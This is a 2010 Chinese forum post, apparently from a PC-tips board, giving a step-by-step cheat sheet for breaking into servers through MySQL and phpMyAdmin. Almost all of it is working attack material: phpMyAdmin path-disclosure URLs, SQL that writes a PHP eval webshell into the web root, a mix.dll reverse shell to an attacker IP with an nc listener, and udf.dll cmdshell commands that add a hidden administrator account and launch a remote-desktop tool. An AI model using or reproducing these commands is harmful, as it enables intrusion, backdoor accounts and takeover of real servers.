利用Mysql和PHPmyadmin提权入侵

社区服务
高级搜索
猴岛论坛电脑百科利用Mysql和PHPmyadmin提权入侵
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
0个回复

[网络问题]利用Mysql和PHPmyadmin提权入侵

楼层直达
不懂也不知道

ZxID:10586231

等级: 禁止发言

举报 只看楼主 使用道具 楼主   发表于: 2010-07-07 0
利用Mysql和PHPmyadmin提权入侵
1:phpmyadmin 后台拿webshell
phpmyadmin爆路径方法:
weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
http://url/phpmyadmin/libraries/select_lang.lib.php
pphpmyadmin/libraries/export/xls.php
hpmyadmin\themes\darkblue_orange\layout.inc.php

D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
----end code---

2:mix.dll提权
D:/usr/www/html/mix.dll
mysql -h 目标ip -uroot -p
\. c:\mysql.txt
select Mixconnect('反弹ip','端口');
nc -vv -l -p 1983

3:udf.dll提权
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('c:\3389.exe');
drop function cmdshell; 删除函数
select cmdshell('netstat -an');
load data infile "d:\\www\\gb\\about\\about.htm" into table tmp;
判断文件存不存在mysql的语句
« 返回列表
发帖 回复